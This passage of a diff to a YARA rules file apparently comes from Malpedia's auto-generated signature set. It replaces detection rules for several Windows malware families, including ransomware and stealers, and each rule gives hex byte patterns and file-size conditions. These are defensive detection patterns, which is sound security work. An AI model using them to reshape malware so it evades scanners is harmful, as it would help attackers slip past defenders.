-		$sequence_1 = { 488d0d8f150100 eb62 488b1d???????? 4c8d4c2428 ba01000000 4889c1 41b840000000 }
-		$sequence_2 = { 488b13 4889f1 4883c308 e8???????? ebea 4881c420010000 5b }
-		$sequence_3 = { ffd3 488d1590f60100 4889c1 e8???????? b901000000 e8???????? 90 }
-		$sequence_4 = { 48893d???????? 498dbe50010000 48891d???????? 488d1d80dc0300 4c891d???????? 4c8d1d72e10300 }
-		$sequence_5 = { 483346f0 4889842490000000 e9???????? 488b3a 4883c208 4889f8 4989fc }
-		$sequence_6 = { 488b15???????? 4c89e1 e8???????? 4989c4 e9???????? 488b43f0 488d53f0 }
-		$sequence_7 = { 488b03 4989df 4889fa 4885c0 7403 488b10 498b4f08 }
-		$sequence_8 = { 4c8d2d33db0200 e8???????? 4c89e9 4889c2 e8???????? 488b0d???????? ba18000000 }
-		$sequence_9 = { 89dd c1c507 4431d5 448b9424d8000000 428db416708b4bc2 4189da 01ee }
+		$sequence_0 = { 83c602 43 3b5df4 72e6 8b7de4 eb07 8bcf }
+		$sequence_1 = { ff75f4 6aff ff15???????? 5f 5e 8bc3 5b }
+		$sequence_2 = { 8d95d4fdffff c785d4fdffff2c020000 8bce e8???????? e9???????? e8???????? 8b8ddcfdffff }
+		$sequence_3 = { 85c9 7405 e8???????? 5e 8bc3 5b 5f }
+		$sequence_4 = { ff7508 6801000040 57 53 ffd0 f7d8 5f }
+		$sequence_5 = { ff7510 6aff ff7508 6a00 68e9fd0000 ffd0 5e }
+		$sequence_6 = { ff55f0 8945e0 837de000 0f84eb000000 ff75ec 6a00 ff55e8 }
+		$sequence_7 = { e8???????? 8bd6 8bc8 e8???????? ff751c ff7518 }
+		$sequence_8 = { 6a00 6a00 681f000f00 57 ffd0 5f 5e }
+		$sequence_9 = { 8d8df8efffff 51 ffd0 5e 85c0 7917 b9???????? }
 
 	condition:
-		7 of them and filesize < 648192
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Maui_Auto : FILE
+rule MALPEDIA_Win_Killav_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c8e2f403-ec0e-5c62-bc65-b773780a2de5"
+		id = "964918fc-ee46-54ff-896b-e1283f7b0e40"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maui"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.maui_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.killav"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.killav_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "7f30138f7904f9e137800e0205092628d325a3b69e4098e86eb63774c736d746"
+		logic_hash = "8efc8b29b31fba331f15fc6d418a70e9cc051d66f52514c3f27af471a4a7b82f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104755,32 +105167,32 @@ rule MALPEDIA_Win_Maui_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85ff 7505 49 85c9 7ff2 894e04 5f }
-		$sequence_1 = { 85f6 7479 6a00 e8???????? 8d4c240c 51 89442410 }
-		$sequence_2 = { 241c 51 57 e8???????? 83c418 85c0 }
-		$sequence_3 = { 50 53 e8???????? 83c408 85c0 0f84a2000000 83c602 }
-		$sequence_4 = { 68d7020000 68???????? 6886000000 68a3000000 6a06 c7450000000000 e8???????? }
-		$sequence_5 = { 894c2420 0fb60f bd07010000 897c241c 66852c48 7431 0fb64f01 }
-		$sequence_6 = { 41 57 51 e8???????? 83c40c 85c0 0f84d9000000 }
-		$sequence_7 = { e8???????? a3???????? e8???????? 85c0 7d09 e8???????? 85c0 }
-		$sequence_8 = { 8b5c2410 55 8b6c241c 57 8b7c241c 81fd00000040 724e }
-		$sequence_9 = { 3bca 741f 8b4624 3bc2 7418 894c2418 895620 }
+		$sequence_0 = { e8???????? 83c408 6a09 33c0 c745d800000000 68???????? 8d4dd8 }
+		$sequence_1 = { 51 e8???????? 83c408 6a13 33c0 c745d800000000 68???????? }
+		$sequence_2 = { 85c0 0f84b7910000 83f808 7d0f 6bc018 05???????? }
+		$sequence_3 = { eb1a 8b4508 8bc8 83e03f c1f906 6bd038 8b0c8d70ba4300 }
+		$sequence_4 = { 8b0c8d70ba4300 804c112802 5b 2bf7 83e6fe 5f 8bc6 }
+		$sequence_5 = { 895db8 c745dc01000000 8b048570ba4300 8945d4 0f8533010000 8b55d4 8bc3 }
+		$sequence_6 = { 8b0b 8b4904 6a00 ff75dc ff75e8 }
+		$sequence_7 = { 0fb74d08 33c0 663b88bcf34200 740d 83c002 83f814 }
+		$sequence_8 = { c645fc15 50 8d4dd0 e8???????? c645fc00 }
+		$sequence_9 = { 741c 81f900000400 7542 0c80 88441628 8b04bd70ba4300 c644102901 }
 
 	condition:
-		7 of them and filesize < 1616896
+		7 of them and filesize < 517120
 }
-rule MALPEDIA_Win_Puzzlemaker_Auto : FILE
+rule MALPEDIA_Win_Flusihoc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "62794821-c42e-5220-ad0d-6e7823ce4882"
+		id = "70e43055-e110-5f44-83f7-dea02c83279f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.puzzlemaker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.puzzlemaker_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flusihoc_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "e75d1e0c1e55c34f83f0daa3660ed41869121e99648bc4cb3b1da2986e8ecbae"
+		logic_hash = "03055e982040b1f87a417ce4ea912aa6346f4a9287782a46033bfb1539ddc34d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104794,32 +105206,38 @@ rule MALPEDIA_Win_Puzzlemaker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c74078feffffff 83ffff 0f8c60040000 41837e0800 4c8d05b7b6ffff }
-		$sequence_1 = { 4883ec20 8bfa 4c8d0d25a00000 488bd9 488d151ba00000 b916000000 4c8d0507a00000 }
-		$sequence_2 = { 448bc0 4c8d157d0a0200 0f1f4000 660f1f840000000000 410fb6d0 420fb60c12 }
-		$sequence_3 = { 488905???????? 4885c0 7551 488b0d???????? 488d157c160200 }
-		$sequence_4 = { 4c8d0d3da30000 33c9 4c8d0530a30000 488d1531a30000 e8???????? 4885c0 }
-		$sequence_5 = { ff15???????? 4c8be0 4c896ddf 488b4dc7 488b11 4c8b5230 }
-		$sequence_6 = { e8???????? 488db328010000 bd06000000 488d7b38 488d05462d0100 }
-		$sequence_7 = { 84c0 7421 4885db 750b 488d1d83f20000 48895f48 4863d6 }
-		$sequence_8 = { 7410 41ffc0 4983c102 4181f880000000 72e1 448bc0 }
-		$sequence_9 = { 418bd2 4d8b8cc7f02b0200 498bfa 4b8d04f1 443854383e }
+		$sequence_0 = { 740b 40 8816 8a1408 46 }
+		$sequence_1 = { 8b442410 6aff 50 ff15???????? 8b4c2410 }
+		$sequence_2 = { 57 6a40 8d442428 6a00 50 c744242c44000000 e8???????? }
+		$sequence_3 = { f3a5 c684246402000000 e8???????? 68d6000000 }
+		$sequence_4 = { 7507 80864d01000004 83f822 7506 fe8e42010000 }
+		$sequence_5 = { 8bec 83e4f8 81ece40b0000 a1???????? 33c4 898424e00b0000 53 }
+		$sequence_6 = { 8d7c2428 50 f3a5 c684246401000000 }
+		$sequence_7 = { 33c0 888c045e010000 8a4c042c 40 }
+		$sequence_8 = { 8b8c24ec0b0000 5f 5e 5b 33cc 33c0 e8???????? }
+		$sequence_9 = { ff15???????? 8b4c2410 51 ffd6 8b542414 52 ffd6 }
+		$sequence_10 = { fe06 fe461e 3d68010000 7505 fe06 fe4e17 }
+		$sequence_11 = { 52 ffd6 6a0a ff15???????? }
+		$sequence_12 = { 8b8df4feffff 6804010000 8d85f8feffff 50 6a01 }
+		$sequence_13 = { 8b95f4feffff 52 ff15???????? 8b4dfc 33cd 33c0 }
+		$sequence_14 = { 51 6a00 ff15???????? 8d95f4feffff 52 6806000200 }
+		$sequence_15 = { 6a00 68???????? 6802000080 ff15???????? 85c0 752f }
 
 	condition:
-		7 of them and filesize < 331776
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Pubload_Auto : FILE
+rule MALPEDIA_Win_Pay2Key_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eb3eb2a3-33cb-52f0-8b9b-1e92524c642b"
+		id = "8e07d004-8ab0-5ac0-b5f3-02a0577c17ab"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubload"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pubload_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pay2key_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "cbebb262e4f807799c3d6fba9199253493785b2d8970bb9dd2ccb71611e2a01f"
+		logic_hash = "bffaa691493d14e2f3352a01cee177c0e343912969f9938647f417173ef48232"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104833,32 +105251,32 @@ rule MALPEDIA_Win_Pubload_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c408 33c9 68???????? 66894802 }
-		$sequence_1 = { ff15???????? 68???????? 6a00 6a00 6a00 ff15???????? c3 }
-		$sequence_2 = { 6804010000 68???????? 6a00 ff15???????? 6a5c }
-		$sequence_3 = { ff15???????? 6a5c 68???????? e8???????? 83c408 33c9 68???????? }
-		$sequence_4 = { 83c408 33c9 68???????? 66894802 ff15???????? }
-		$sequence_5 = { 6803001f00 ff15???????? 85c0 7408 6a00 ff15???????? 68???????? }
-		$sequence_6 = { 68???????? 6a00 6a00 6a00 ff15???????? c3 }
-		$sequence_7 = { 68???????? 6a00 ff15???????? 6a5c 68???????? e8???????? 83c408 }
-		$sequence_8 = { 68???????? e8???????? 83c408 33c9 68???????? }
-		$sequence_9 = { 6a00 6a00 6a00 ff15???????? c3 }
+		$sequence_0 = { c707???????? 5f 5e 8be5 5d c3 c6470400 }
+		$sequence_1 = { 0f8412000000 83a50ce6fffffe 8b8dfce5ffff e9???????? c3 }
+		$sequence_2 = { c60000 8d4540 6a00 50 e8???????? 83ec18 c645fc05 }
+		$sequence_3 = { 8bce ff5004 8b45f0 8b4d0c 8907 8b4514 895f04 }
+		$sequence_4 = { 8d4e34 c645fc09 c741140f000000 c7411000000000 83791410 7204 8b01 }
+		$sequence_5 = { 8db758030000 8b4614 83f808 720b 40 8bce 50 }
+		$sequence_6 = { c7411000000000 8b4114 894754 c7411400000000 8b5d10 c745fc00000000 8b0b }
+		$sequence_7 = { c745fc01000000 8b4de0 85c9 7414 8b01 8b4010 ffd0 }
+		$sequence_8 = { 8886b2000000 c686b300000001 c7411407000000 c7411000000000 83791408 7204 8b01 }
+		$sequence_9 = { c645fc01 8d45a8 6a00 50 8d4dd8 c745ec0f000000 c745e800000000 }
 
 	condition:
-		7 of them and filesize < 524288
+		7 of them and filesize < 2252800
 }
-rule MALPEDIA_Win_Rokku_Auto : FILE
+rule MALPEDIA_Win_7Ev3N_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5e0917d2-b33a-54a8-a28e-92ca643aac23"
+		id = "005aa5f2-162b-5bf7-ad49-b9d7ff2db13f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rokku_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.7ev3n_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "5443b2e7560cc69ec04b0b3e247a5b78bf0ac816da2824e945b614a9052a8971"
+		logic_hash = "4eede98c5fa06e7258d260c1c452e6214bfc253858a007d8970063a1ca550ad3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104872,32 +105290,32 @@ rule MALPEDIA_Win_Rokku_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0bd0 c1e90e 8b442418 0bf1 33442444 }
-		$sequence_1 = { c1fb1a 01442420 8b442430 1154241c f76c2438 01442420 8b44246c }
-		$sequence_2 = { 8d54240c e8???????? a3???????? 33c0 c744240c5d786f7a c74424106b4c6f72 66c74424146b00 }
-		$sequence_3 = { 03d0 33ca 8954242c 8b542428 c1c10c 03d1 }
-		$sequence_4 = { 8bf1 89742408 85f6 745d 53 8b1e 57 }
-		$sequence_5 = { 83f917 72f0 8b0d???????? 88542439 8d542422 e8???????? }
-		$sequence_6 = { 8d7d28 53 8d5328 8bcf e8???????? 8b742448 83c550 }
-		$sequence_7 = { 894a0c 8b4c2420 0fa4c11a 8b4c2410 c1e01a 2bc8 8b842488000000 }
-		$sequence_8 = { 7517 8b0e 68???????? e8???????? 33c9 84c0 0f45cf }
-		$sequence_9 = { 41 83f905 7305 8a55ee ebee }
+		$sequence_0 = { 6a00 8d85f0d9ffff 50 8d8dd0cdffff e8???????? 8bce 2bcf }
+		$sequence_1 = { 2bcf 3bc1 0f84e2910000 8dbd50dcffff 8d4f02 0f1f840000000000 }
+		$sequence_2 = { 2bcf 3bc1 0f8412490000 8dbdcce7ffff 8d4f02 0f1f840000000000 668b07 }
+		$sequence_3 = { e8???????? 8bce 2b8d00cbffff 3bc1 0f84ce070000 8dbd50d9ffff 8d4f02 }
+		$sequence_4 = { e8???????? 8bce 2bcf 3bc1 0f84427a0000 8dbdf8eeffff 8d4f02 }
+		$sequence_5 = { 6a00 8d85a0e3ffff 50 8d8dd0cdffff e8???????? 8bce 2bcf }
+		$sequence_6 = { 6a00 6800000080 50 ff15???????? 898520ffffff 85c0 7509 }
+		$sequence_7 = { 83c702 6685c0 75f5 2bf9 d1ff 6a00 8d8500edffff }
+		$sequence_8 = { f30f7e05???????? 660fd68564e6ffff 0fb705???????? 6689856ce6ffff f30f7e05???????? 660fd68558e6ffff 0fb705???????? }
+		$sequence_9 = { d1ff 6a00 8d85acfbffff 50 8d8dd0cdffff e8???????? 8bce }
 
 	condition:
-		7 of them and filesize < 548864
+		7 of them and filesize < 803840
 }
-rule MALPEDIA_Win_Findpos_Auto : FILE
+rule MALPEDIA_Win_Petrwrap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce612255-6624-50a9-a03c-c60c58099af8"
+		id = "4231d0f2-bcca-5065-a819-dce30768f04e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.findpos_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.petrwrap_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "5ddd8150bb7549b194e3af334d2fd54523af2954906df2786ddd0dce1684bb61"
+		logic_hash = "df938443ce3aca6f9d40529b8ac059dfa5d88a7d6127ee28afd16bed66ad9fc4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104911,32 +105329,32 @@ rule MALPEDIA_Win_Findpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb6c0 50 0fb6c1 50 8d85e8e7ffff 50 }
-		$sequence_1 = { 42 8a1a 0fb63411 0fb6c3 83ce20 83c820 2bf0 }
-		$sequence_2 = { 3375f0 337df4 8b4008 8985dcfeffff }
-		$sequence_3 = { 8d4dd8 895dfc e8???????? 837dec10 8d55d8 0f4355d8 33c9 }
-		$sequence_4 = { 83791410 7202 8b09 33d2 e8???????? 85c0 7419 }
-		$sequence_5 = { 0f84d6000000 48 0f8497000000 83e804 7468 83e803 }
-		$sequence_6 = { bf3ce91fe0 0adb e3de a863 125f55 cae845 7d31 }
-		$sequence_7 = { e8???????? 6a00 6a01 8d8c2408010000 e9???????? 83fb27 0f871b010000 }
-		$sequence_8 = { 57 8b7d08 3b30 7554 394510 }
-		$sequence_9 = { ff15???????? 8bc8 890d???????? 85c9 743b 8b45f8 a3???????? }
+		$sequence_0 = { 8b442458 8bf9 0fa4c119 33f2 c1e019 }
+		$sequence_1 = { 894c241c 3bcf 763b 6845030000 68???????? 6a44 6a68 }
+		$sequence_2 = { 68???????? 57 e8???????? 83c408 85c0 0f89ff010000 57 }
+		$sequence_3 = { 3bd9 7301 47 8b442414 89700c 8b4508 33f6 }
+		$sequence_4 = { 50 e8???????? 83c410 ff15???????? 8945b4 b808000000 e8???????? }
+		$sequence_5 = { 83c430 83c20a 89542444 85d2 }
+		$sequence_6 = { 330c85d01c4400 8b44242c c1e818 330c85d0184400 0fb6c2 330c85d0244400 8bc3 }
+		$sequence_7 = { 8b4c2440 83c42c 894c241c 85c0 7507 6831020000 eb44 }
+		$sequence_8 = { 8b4d00 89450c 8b03 894c2424 8d04b0 2bf2 c1fe1f }
+		$sequence_9 = { 4a 75f5 8b0e c7460406000000 83c114 8d4900 8b01 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 1024000
 }
-rule MALPEDIA_Win_Svcready_Auto : FILE
+rule MALPEDIA_Win_Rusty_Claw_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e83853f3-e66b-52ee-ae09-132965a1cb28"
+		id = "8fc75c4e-ba70-59d2-9f38-a3aed8cf6b13"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.svcready"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.svcready_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rusty_claw"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rusty_claw_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "70f5a6e47586d208a50ef25a32145ee8864e4794b50daca718026585b6e54bc9"
+		logic_hash = "75f315fae698621629456c9a1f27e13b2e79a7325d19df3b6033848f0862def4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104950,32 +105368,32 @@ rule MALPEDIA_Win_Svcready_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895c2410 8bc7 896c2418 f7d2 33c6 0bfa 21542410 }
-		$sequence_1 = { eb02 33f6 895d28 8d4702 }
-		$sequence_2 = { 89442410 33c0 89742414 896c2418 895c241c ab }
-		$sequence_3 = { 66c7070100 885f02 891e 885e04 895e08 895e0c 895dfc }
-		$sequence_4 = { 8b442428 40 50 57 51 }
-		$sequence_5 = { 8b01 8902 83c204 83c104 894dec 8b45e8 ebea }
-		$sequence_6 = { 50 ff74241c ff15???????? 33c0 8d7c2408 ab }
-		$sequence_7 = { 8bca 8dbefc600000 f3ab 8bca }
-		$sequence_8 = { 2bd1 8b7c2414 2bf1 c1fa02 c1fe02 3bfa 7678 }
-		$sequence_9 = { 3c58 7504 897c2414 52 51 e8???????? 89442430 }
+		$sequence_0 = { 57 56 83ec08 8b5c241c 8b7c2418 89e0 8d742404 }
+		$sequence_1 = { 5b 5d c3 8b4e10 ba???????? 6a04 e8???????? }
+		$sequence_2 = { 037904 034108 89d1 c1c60d c1ea0a c1c10f 31ce }
+		$sequence_3 = { 8b5664 e8???????? b001 8b8eb0050000 64890d00000000 8d65f4 5e }
+		$sequence_4 = { 29c2 29ca 85d2 7409 4a 803ec0 8d76ff }
+		$sequence_5 = { 0fb7c2 01c8 c3 89d0 354718c32c c1c002 31d0 }
+		$sequence_6 = { 8dbe850ab727 8974245c 89442408 8d81fc6d2c4d 8b4c2458 89442450 8b442430 }
+		$sequence_7 = { 6a0a 5a f7e2 89c3 0f90c2 01cb 0f92c0 }
+		$sequence_8 = { 8b6c241c 8974240c 89de 894c2444 89542438 89442420 894c2424 }
+		$sequence_9 = { 8d043b 99 2bc2 8bf0 d1fe 6a55 ff34f5b8444300 }
 
 	condition:
-		7 of them and filesize < 1187840
+		7 of them and filesize < 518144
 }
-rule MALPEDIA_Win_Net_Star_Auto : FILE
+rule MALPEDIA_Win_Dimnie_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e4a1e4d6-66ac-52a3-a1bf-1a40ab526cfc"
+		id = "faec140a-eb16-5876-b92f-a4f4dcf83df4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.net_star"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.net_star_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dimnie_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "93e5fe016bec66ccfdfdaabf1a580d9d03655d26419d498170f8b7ee102df278"
+		logic_hash = "8e390553f6468d186c93389bf0eaa300637b1e54d4adacff8f64a890d9a8be5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104989,32 +105407,32 @@ rule MALPEDIA_Win_Net_Star_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 281f00000a 1106 281e00000a dc 1109 6f2500000a 1109 }
-		$sequence_1 = { 6f2400000a 6f2200000a de0f 1107 281f00000a }
-		$sequence_2 = { 728d000070 2a 07 2802000006 1305 281a00000a }
-		$sequence_3 = { 740100001b 0c 03 7243000070 6f1500000a }
-		$sequence_4 = { 1308 1108 731d00000a 1309 1109 }
-		$sequence_5 = { 09 281100000a 5a 281200000a 1304 08 09 }
-		$sequence_6 = { 08 09 1104 281300000a a2 09 }
-		$sequence_7 = { 6f1700000a 6f1500000a 740100001b 0d 09 2d06 725f000070 }
-		$sequence_8 = { 09 08 8e 69 32dd 08 }
-		$sequence_9 = { 26 de49 130a 1109 6f2100000a 1109 }
+		$sequence_0 = { eb04 c645af3d 8b4d0c 8a55af 885102 837d1002 }
+		$sequence_1 = { 7e28 8b5508 0fb64201 83e00f c1e002 8b4d08 0fb65102 }
+		$sequence_2 = { 8b450c eb54 8b550c 2b5508 83fa01 751c 0f31 }
+		$sequence_3 = { c70201000000 8b4508 8b08 83e10f 8b5508 }
+		$sequence_4 = { eb54 8b550c 2b5508 83fa01 751c }
+		$sequence_5 = { eb61 8b4d08 3b4d0c 7605 8b450c eb54 8b550c }
+		$sequence_6 = { c70201000000 8b4508 8b08 83e10f 8b5508 890a }
+		$sequence_7 = { 8855ae eb04 c645ae3d 8b450c 8a4dae }
+		$sequence_8 = { b90d000000 be???????? 8d7dbc f3a5 }
+		$sequence_9 = { 8b4d0c 8a55af 885102 837d1002 7e13 8b4508 }
 
 	condition:
-		7 of them and filesize < 50176
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Winordll64_Auto : FILE
+rule MALPEDIA_Win_Aukill_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "42d58eb8-636f-5c90-824f-a4029c096b45"
+		id = "efca2687-336d-54b6-b9e5-6006cad01a63"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winordll64"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.winordll64_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aukill"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aukill_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "ff8a5b9c7eb1fcfe5982c5ada9af48d2cc2fd7ebb77ddf0083a9bd3e03ee5a02"
+		logic_hash = "5efb284cf60297ddb14dee519095e9a3fbc8f6f4ea4b889dc99b33d704551ec0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105028,32 +105446,32 @@ rule MALPEDIA_Win_Winordll64_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b55d0 488364242000 448bc1 4c8d4d48 498bcc ff15???????? 48635538 }
-		$sequence_1 = { 4c8d05c8c40000 498bd4 488bcd e8???????? 85c0 }
-		$sequence_2 = { 75f7 488bcf e8???????? 498b0c24 4585ed }
-		$sequence_3 = { 488bcf ff15???????? 85c0 0f8575ffffff 488bcf ff15???????? b8c0020000 }
-		$sequence_4 = { e8???????? 4c8d5c2430 4c895c2420 4c8d4c2438 41b807000000 488b442440 }
-		$sequence_5 = { be08780000 8bce e8???????? 488bf8 4885c0 0f8422010000 48ffce }
-		$sequence_6 = { 488d5547 488d4def 4c895d47 e8???????? 4c8d1d9b4a0000 488d150c640000 488d4def }
-		$sequence_7 = { 48ffc1 483bca 72f0 458bc7 }
-		$sequence_8 = { 418800 49ffc0 49ffc3 41d1ea 418b03 488b6c2450 be00000080 }
-		$sequence_9 = { 488d542458 488d4c2428 e8???????? 4c8d1d12e50000 4c895c2428 }
+		$sequence_0 = { 33d2 b940040000 ff15???????? 488bd8 }
+		$sequence_1 = { 488b442460 4c8d442430 488b4c2458 33d2 4889442434 }
+		$sequence_2 = { 48894c2430 ba04003583 894c2428 48894c2420 448d4920 48894c2450 488b0d???????? }
+		$sequence_3 = { 771c 488b0b ff15???????? 0fb608 }
+		$sequence_4 = { 33c9 48895c2440 48894c2438 4c8d442440 48894c2430 ba04003583 }
+		$sequence_5 = { 488b442460 4c8d442430 488b4c2458 33d2 }
+		$sequence_6 = { 48894c2420 448d4920 48894c2450 488b0d???????? }
+		$sequence_7 = { 448d4920 48894c2450 488b0d???????? 48897c2458 4889442448 }
+		$sequence_8 = { ff15???????? 85c0 751d 488bcb ff15???????? ff15???????? }
+		$sequence_9 = { 8905???????? c705????????02000000 48c705????????04000000 ff15???????? 488905???????? 4885c0 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 446464
 }
-rule MALPEDIA_Win_Kapeka_Auto : FILE
+rule MALPEDIA_Win_Formbook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7a97f5ec-4398-5b2b-8ee0-712591242f63"
+		id = "8c050ce6-9039-5f0c-9eda-53d46123b24c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kapeka"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kapeka_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.formbook_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "3423309dd00c2032617bc59ad3fa8dc9a6be83aaab30c6da6deeede3840c0066"
+		logic_hash = "986f42b5e94183a87a4b3ecc04f39bd7a6cdd90998ce87e5be2a2b4f7bf3d394"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105067,32 +105485,32 @@ rule MALPEDIA_Win_Kapeka_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 498bcf e8???????? 488d15a8530100 488bc8 e8???????? ba02100000 488d4d10 }
-		$sequence_1 = { 488bda 488bf9 e8???????? 488bd3 48895f28 488bcf e8???????? }
-		$sequence_2 = { 488bc8 e8???????? 488be8 eb03 488bef 488d4c2420 e8???????? }
-		$sequence_3 = { 4803c8 e8???????? 488b442468 488b4c2460 482bc1 }
-		$sequence_4 = { 418bc3 c1e810 0fb6c8 418bbc9470dd0100 4133bc8c70d90100 8bc6 48c1e818 }
